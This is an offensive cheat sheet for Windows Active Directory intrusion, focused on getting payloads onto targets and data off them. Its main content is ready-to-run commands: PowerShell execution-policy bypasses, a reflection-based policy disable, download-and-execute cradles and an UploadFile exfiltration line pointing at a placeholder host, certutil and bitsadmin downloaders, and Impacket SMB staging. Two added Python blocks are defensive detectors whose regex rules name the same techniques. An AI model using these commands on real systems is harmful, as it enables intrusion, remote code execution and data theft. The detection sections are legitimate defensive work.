
AD Exploitation: File Transfer and Execution

Tags: File Transfer, PowerShell, SMB, Exfiltration, Windows

PowerShell File Download & Execution

Executing binaries or scripts through PowerShell is central to exploiting AD environments, and so is getting files onto the target machine in the first place.

Check Execution Policy:

Get-ExecutionPolicy

Run a script with the execution policy bypassed:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

PowerShell Invoke Commands

Get-Content .\file_to_execute.ps1 | Invoke-Expression

GC .\file_to_execute.ps1 | iex

PowerShell.exe -ExecutionPolicy Bypass -File .\file_to_execute.ps1

PowerShell.exe -ExecutionPolicy UnRestricted -File .\file_to_execute.ps1

Set-ExecutionPolicy Bypass -Scope Process

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

Disable Execution Policy via Function:

function Disable-ExecutionPolicy {
    ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}

Disable-ExecutionPolicy
.\file_to_execute.ps1

Bypassing Policy via Piping

Echo Write-Host "script" | PowerShell.exe -noprofile -

Get-Content .\file_to_execute.ps1 | PowerShell.exe -noprofile -

Using type (the cmd.exe equivalent of cat):

type .\runme.ps1 | PowerShell.exe -noprofile -

Download and Execute from Remote Server

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://ip/payload.ps1')"

powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://ip/payload.exe', 'payload.exe')"

Upload/Exfiltration:

powershell -c "(New-Object System.Net.WebClient).UploadFile('http://ip/file_to_extract.txt', 'file_to_extract.txt')"

Combined Method:

powershell -executionpolicy bypass -c "IEX(New-Object Net.WebClient).downloadString('http://ip/payload.ps1')"

Other Native Windows Methods

certutil.exe

certutil.exe -urlcache -split -f http://ip/payload.exe payload.exe

bitsadmin.exe

bitsadmin.exe /transfer mydownloadjob /download /priority high http://ip/payload.exe payload.exe
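Every technique above leaves a distinctive process command line, which is what a defender hunts for. The following Python is an added example written for this post, not code from the original, that scans constructed process-creation records (Sysmon Event ID 1 or Windows 4688 style) for the execution-policy bypasses, download cradles and certutil/bitsadmin transfers listed in this section, alongside benign administrative commands that must not fire. The field names, the sample events and the 198.51.100.7 address are assumptions.

```python
"""Flag process-creation command lines matching the PowerShell execution-policy
bypasses, download cradles and LOLBin transfers covered in the post.

The sample events are constructed; field names are an assumption, not any
product's schema."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    note: str  # what a responder should do with the hit


RULES = (
    # -ExecutionPolicy / -ep / -ex ... Bypass|Unrestricted, or Set-ExecutionPolicy
    Rule("execution_policy_bypass",
         re.compile(r"-e[xp]\w*\s+(?:bypass|unrestricted)|set-executionpolicy", re.I),
         "Policy lowered for this run; pull the script and the parent process."),
    # "powershell -noprofile -" reads the script body from stdin
    Rule("stdin_script_pipe",
         re.compile(r"powershell(?:\.exe)?\s+-noprofile\s+-\s*$", re.I),
         "Script fed via stdin; the parent's command line names the file."),
    # reflection on the private _authorizationManager field disables policy in-process
    Rule("authmgr_reflection",
         re.compile(r"_authorizationmanager", re.I),
         "In-process policy disable via reflection; treat as hostile."),
    Rule("webclient_download",
         re.compile(r"downloadstring\s*\(|downloadfile\s*\(", re.I),
         "Download cradle; extract the URL and check egress logs."),
    Rule("webclient_upload",
         re.compile(r"uploadfile\s*\(", re.I),
         "Possible exfiltration; identify the uploaded file."),
    Rule("certutil_download",
         re.compile(r"certutil(?:\.exe)?\b.*-urlcache", re.I),
         "certutil used as a downloader; recover the fetched file."),
    Rule("bitsadmin_download",
         re.compile(r"bitsadmin(?:\.exe)?\s+/transfer", re.I),
         "BITS job used as a downloader; review the BITS job list."),
)

SAMPLE_EVENTS = [  # constructed; 198.51.100.7 is a documentation-range address
    {"id": 1, "user": "CORP\\jdoe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1"},
    {"id": 2, "user": "CORP\\jdoe",
     "cmd": "powershell -nop -c \"iex(New-Object Net.WebClient).DownloadString('https://198.51.100.7/payload.ps1')\""},
    {"id": 3, "user": "CORP\\jdoe", "cmd": "PowerShell.exe -noprofile -"},
    {"id": 4, "user": "CORP\\jdoe",
     "cmd": "certutil.exe -urlcache -split -f http://198.51.100.7/payload.exe payload.exe"},
    {"id": 5, "user": "CORP\\jdoe",
     "cmd": "bitsadmin.exe /transfer mydownloadjob /download /priority high http://198.51.100.7/payload.exe payload.exe"},
    {"id": 6, "user": "CORP\\jdoe",
     "cmd": "powershell -c \"(New-Object System.Net.WebClient).UploadFile('http://198.51.100.7/f.txt', 'f.txt')\""},
    # fragment of the reflection bypass shown in the post, as it appears in a command line
    {"id": 7, "user": "CORP\\jdoe",
     "cmd": "powershell -c \"$ctx.gettype().getfield('_authorizationManager','nonpublic,instance').setvalue($ctx, $am)\""},
    # benign administrative activity that must not fire
    {"id": 8, "user": "CORP\\svc_backup", "cmd": "powershell.exe -NoProfile -File C:\\Scripts\\Nightly-Backup.ps1"},
    {"id": 9, "user": "CORP\\admin", "cmd": "certutil.exe -verify C:\\certs\\server.cer"},
    {"id": 10, "user": "CORP\\admin", "cmd": "powershell.exe -Command Get-ExecutionPolicy"},
]


def scan(events, rules=RULES):
    """Return (event_id, rule_name) pairs for every rule that matches an event."""
    return [(e["id"], r.name) for e in events for r in rules if r.pattern.search(e["cmd"])]


def hits_by_event(events, rules=RULES):
    """Group matching rule names per event id; events with no hits are omitted."""
    out = {}
    for eid, name in scan(events, rules):
        out.setdefault(eid, []).append(name)
    return out


if __name__ == "__main__":
    notes = {r.name: r.note for r in RULES}
    for eid, names in hits_by_event(SAMPLE_EVENTS).items():
        ev = next(e for e in SAMPLE_EVENTS if e["id"] == eid)
        for name in names:
            print(f"event {eid} user={ev['user']} rule={name}: {notes[name]}")
```

The patterns key on the arguments themselves rather than the process name, so renaming powershell.exe does not evade them; conversely, command-line matching is blind to scripts whose content arrives over stdin or the network, which is why PowerShell script block logging (Event ID 4104) should be collected alongside process creation.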

SMB File Transfer

SMB is an extremely useful file transfer method for both Windows and Linux targets. Its strongest advantage is that payloads can be run directly from the share, so the file never touches the target's disk, and it avoids HTTP downloads, which may be blocked or heavily filtered.

Impacket SMB Server

Start SMB Server:

impacket-smbserver share_name $(pwd) -smb2support -username username -password password

Connect from Target (PowerShell/Evil-WinRM):

$pass = convertto-securestring 'password' -AsPlainText -Force;
$cred = New-Object System.Management.Automation.PSCredential('username', $pass);
New-PSDrive -Name username -PSProvider FileSystem -Credential $cred -Root \\ip\share_name;

List Share Contents:

dir \\ip\share_name

Download File from Share:

copy \\ip\share_name\file_to_extract.txt file_to_extract.txt

Upload File to Share:

copy file_to_extract.txt \\ip\share_name\file_to_extract.txt
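The SMB route avoids HTTP filtering, but it still shows up in two places a defender already collects: outbound TCP/445 connections to hosts that are not known file servers, and UNC paths that name the share by raw IP rather than hostname, as the commands above do. The following Python is an added example written for this post, not code from the original, that applies both checks to constructed records; the allowlist, the 10.0.0.x addresses, the field names and the sample command lines are all assumptions.

```python
"""Spot SMB transfers of the kind described above from two telemetry sources:
network-connection events (Sysmon Event ID 3 style) and command lines that
reference a UNC path by raw IP. All records below are constructed."""
import ipaddress
import re

# Hosts expected to serve SMB in this fictional estate (constructed allowlist).
KNOWN_FILE_SERVERS = {"10.0.0.10", "10.0.0.11"}

# Matches \\<host>\<share> and captures both parts; stops at whitespace, backslash or ';'.
UNC_RE = re.compile(r"\\\\([^\\\s;]+)\\([^\\\s;]+)")

SAMPLE_CONNECTIONS = [  # constructed network-connection events
    {"host": "WS01", "image": r"C:\Windows\explorer.exe", "dst_ip": "10.0.0.10", "dst_port": 445},
    {"host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst_ip": "10.0.0.50", "dst_port": 445},
    {"host": "WS02", "image": r"C:\Windows\System32\cmd.exe", "dst_ip": "10.0.0.50", "dst_port": 445},
    {"host": "WS02", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "93.184.216.34", "dst_port": 443},
]

SAMPLE_COMMANDS = [  # constructed process command lines
    r"powershell -c New-PSDrive -Name share -PSProvider FileSystem -Root \\10.0.0.50\share_name",
    r"cmd.exe /c copy \\10.0.0.50\share_name\file_to_extract.txt file_to_extract.txt",
    r"net use Z: \\FS01.corp.local\projects /persistent:no",
    r"powershell -c Get-ChildItem C:\Users\jdoe",
]


def is_ip_literal(host):
    """True when the UNC host part is an IPv4/IPv6 literal rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_smb_connections(events, allowlist=KNOWN_FILE_SERVERS):
    """Outbound TCP/445 to any host that is not a known file server."""
    return [e for e in events if e["dst_port"] == 445 and e["dst_ip"] not in allowlist]


def unc_by_ip(command_lines):
    """(host, share, command) for every UNC path whose host is an IP literal.

    Legitimate shares are normally mapped by DNS name (and Kerberos needs a name),
    so an IP-addressed share in a command line is worth a look."""
    found = []
    for cmd in command_lines:
        for host, share in UNC_RE.findall(cmd):
            if is_ip_literal(host):
                found.append((host, share, cmd))
    return found


if __name__ == "__main__":
    for e in suspicious_smb_connections(SAMPLE_CONNECTIONS):
        print(f"{e['host']}: {e['image']} -> {e['dst_ip']}:445 (not a known file server)")
    for host, share, cmd in unc_by_ip(SAMPLE_COMMANDS):
        print(f"UNC by IP: \\\\{host}\\{share} in: {cmd}")
```

An IP-literal UNC path also forces NTLM rather than Kerberos, so the same event should correlate with an NTLM authentication (4624 logon type 3 with NTLM) to a host that is not a domain file server; the network rule above is what catches the case where the attacker maps the share by hostname instead.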

Other Methods

  • ftp
  • tftp
  • mshta
  • rundll32
  • php
  • socat
  • netcat